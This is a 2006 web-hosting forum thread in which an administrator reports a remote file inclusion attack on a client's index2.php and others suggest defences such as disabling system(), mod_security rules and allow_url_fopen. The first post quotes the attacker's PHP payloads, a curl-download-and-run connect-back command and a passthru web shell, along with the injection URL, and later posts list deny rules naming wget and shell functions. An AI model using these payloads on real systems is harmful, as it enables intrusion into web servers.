The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Help, hacker uploading files /tmp with external PHP code

Discussion in 'General Discussion' started by jeroman8, May 3, 2006.

  1. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    16
    Hi!

    A hacker is uploading shell scripts to /tmp on one server through a clients php script.
    The way he is doing this is going to my client's index2.php file and the adding a command in the end so it will query/go to a file placed on another server.
    This file is called m.gif but it's not an image, it's php commands in the file.
    You can probably see it live by going to the urls in log below.

    Anyway - any idea on how to stop this ?
    Disable a funktion in PHP maybe but hopefully non that will affect other clients.
    Or a mod_sec rule maybe.
    I have blocket his IP offcourse as welll as the server the php commands on.


    m.gif=

    <?
    system("cd /tmp;curl -o cb maka.home.ro/cb;perl cb 140.128.101.1 80");
    ?>

    pass.gif=

    <?
    passthru($_GET['cmd']);
    ?>

    /usr/local/apache/domlogs/xxx.domain.com:193.231.139.27 - - [03/May/2006:07:07:24 +0200] "GET
    /index2.php?title=PageTitle&page=http://maka.home.ro/m.gif? HTTP/1.1" 200 3478 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
    5.1)"
    /usr/local/apache/domlogs/xxx.domain.com:193.231.139.27 - - [03/May/2006:07:07:24 +0200] "GET /gfx/5x5.gif HTTP/1.1" 404 -
    "http://xxx.domain.com/index2.php?title=PageTitle&page=http://maka.home.ro/m.gif?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows
     
  2. claudio

    claudio Well-Known Member

    Joined:
    Jul 31, 2004
    Messages:
    201
    Likes Received:
    0
    Trophy Points:
    16
    Most of this files would be empty or not harmful if you disable = "system, exec" in your php.ini also set safe mode = on (you can disable some of the safe mode individually on your httpd.conf if some customer require)

    i wrote a small perl script that i use as a cron each 10 minutes looking for strange files in my /tmp

    then by the time i can grep all .php in domlogs and the execute some of the pages in order to discover which of then is causing the file injection or jamming it on /tmp

    good luck ; )

    Claudio
     
  3. nickp666

    nickp666 Well-Known Member

    Joined:
    Jan 28, 2005
    Messages:
    770
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    /dev/null
    mod_security and a good rule set should stop most of those type of attacks, catches a lot on one of my boxes, also mounting /tmp noexec would be a good idea, this has been discussed many times on this board so just do a search
     
  4. jackie46

    jackie46 BANNED

    Joined:
    Jul 25, 2005
    Messages:
    537
    Likes Received:
    0
    Trophy Points:
    0
    Really, care to enlighten all of use as to how you would disable safe mode on an individual basis?
     
  5. mOdY

    mOdY Well-Known Member

    Joined:
    Dec 25, 2004
    Messages:
    80
    Likes Received:
    0
    Trophy Points:
    6
    nice thingy, would be nice if you shared it with us. :cool:
     
  6. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Get mod_security and a good ruleset, and use this code:

    SecFilter "page=http"

    The problem is poorly written PHP code that just fopen's a page / URL and doesn't check / use an array to grab from.
     
  7. destr0yr

    destr0yr Well-Known Member

    Joined:
    May 4, 2004
    Messages:
    58
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Kelowna, BC.
    Upgrading your PHP CMS/blog/forum/whatever would be the ultimate solution. index2.php looks mambo-ish. make sure you client is running the most current version - go so far as to disable their site until they do upgarde. Security should be as large an issue for them as it is for you (IMHO).

    As for mod_security, use it, love it, embrace it, be one with it.

    Current ruleset that works for me:
    Code:
    # WEB-ATTACKS wget command attempt
    SecFilterSelective THE_REQUEST "wget "
    
    # WEB-ATTACKS uname -a command attempt
    SecFilterSelective THE_REQUEST "uname -a"
    
    # WEB-ATTACKS .htgroup access
    SecFilterSelective THE_REQUEST "\.htgroup"
    
    # WEB-ATTACKS .htaccess access
    SecFilterSelective THE_REQUEST "\.htaccess"
    
    # WEB-CLIENT Javascript URL host spoofing attempt
    SecFilter "javascript\://"
    
    # WEB-MISC cross site scripting \(img src=javascript\) attempt
    SecFilter "img src=javascript"
    
    # WEB-MISC cd..
    SecFilterSelective THE_REQUEST "cd\.\."
    
    # WEB-MISC ///cgi-bin access
    SecFilterSelective THE_REQUEST "///cgi-bin"
    
    # WEB-MISC /cgi-bin/// access
    SecFilterSelective THE_REQUEST "/cgi-bin///"
    
    # WEB-MISC /~root access
    SecFilterSelective THE_REQUEST "/~root"
    
    # WEB-MISC /~ftp access
    SecFilterSelective THE_REQUEST "/~ftp"
    
    # WEB-MISC htgrep attempt
    SecFilterSelective THE_REQUEST "/htgrep" chain
    SecFilter "hdr=/"
    
    # WEB-MISC htgrep access
    SecFilterSelective THE_REQUEST "/htgrep" log,pass
    
    # WEB-MISC .history access
    SecFilterSelective THE_REQUEST "/\.history"
    
    # WEB-MISC .bash_history access
    SecFilterSelective THE_REQUEST "/\.bash_history"
    
    # WEB-MISC /~nobody access
    SecFilterSelective THE_REQUEST "/~nobody"
    
    # WEB-PHP PHP-Wiki cross site scripting attempt
    SecFilterSelective THE_REQUEST "<script"
    
    # WEB-PHP strings overflow
    SecFilterSelective THE_REQUEST "\?STRENGUR"
    
    # WEB-PHP PHPLIB remote command attempt
    SecFilter "_PHPLIB\[libdir\]"
    
    #More PHPBB worms
    SecFilterSelective REQUEST_URI "/viewtopic\.php\?" chain
    SecFilterSelective ARGS "(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(([0-9a-fA-Fx]{1,3})\)" 
    
     
  8. Nick A

    Nick A Member

    Joined:
    Jan 16, 2005
    Messages:
    23
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Canada
    Hi Have u run /scripts/securetmp before?
     
  9. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Securetmp wouldn't help, as it's running a perl script.

    You can try chmod 750 /usr/bin/wget and also chmod 750 /usr/bin/curl

    As curl is being used to download the item. Many different ways to secure against this attack.
     
  10. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    16
    Thanks guys for your help in this matter!

    Upgrading the script is not easy since it's not a public script.
    noexec/securetmp for temp is off course already done but that doesn't help, never did.
    I already use almost all Hostmerits mod_sec rules but blocking "http" will block all "good" requests also and is to much on this server since many use external images, include pages etc with php. Off course security should come first but theres a client/money issue also.
    chmod 750 curl and wget is the same thing as removing the functions for the clients - many use it.

    However disable "system" seems to fix this issue with this script !!

    I also have a script checking /tmp and any other catalog I like.
    I set what it should look for and not look for and where and then it email whenever
    for exempal a "hack.pl" och "bc.tar"....is being created in /tmp.

    You can find it and other good scripts here:
    http://forums.cpanel.net/showthread.php?t=25672&highlight=PWS+monitor
     
    #10 jeroman8, May 13, 2006
    Last edited: May 13, 2006
  11. webicom

    webicom Well-Known Member

    Joined:
    Mar 30, 2004
    Messages:
    54
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Slovenia
    Try to set allow_url_fopen = Off. You can find that in php.ini file.

    Regards, Erik
     
  12. rogcan

    rogcan Well-Known Member

    Joined:
    Jun 7, 2004
    Messages:
    48
    Likes Received:
    0
    Trophy Points:
    6
    How do you add that ruleset for mod_security by the way ??

    Can i get a step by step instruction for that please as i would like to use yours destr0yr :)
     
  13. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
    destr0yr

    The ruleset destr0yr is using looks like the default for mod_security and won't help much.

    You need to login by shell and have the ruleset edited then restart apache. If you have more questions about this PM me.
     
Loading...

Share This Page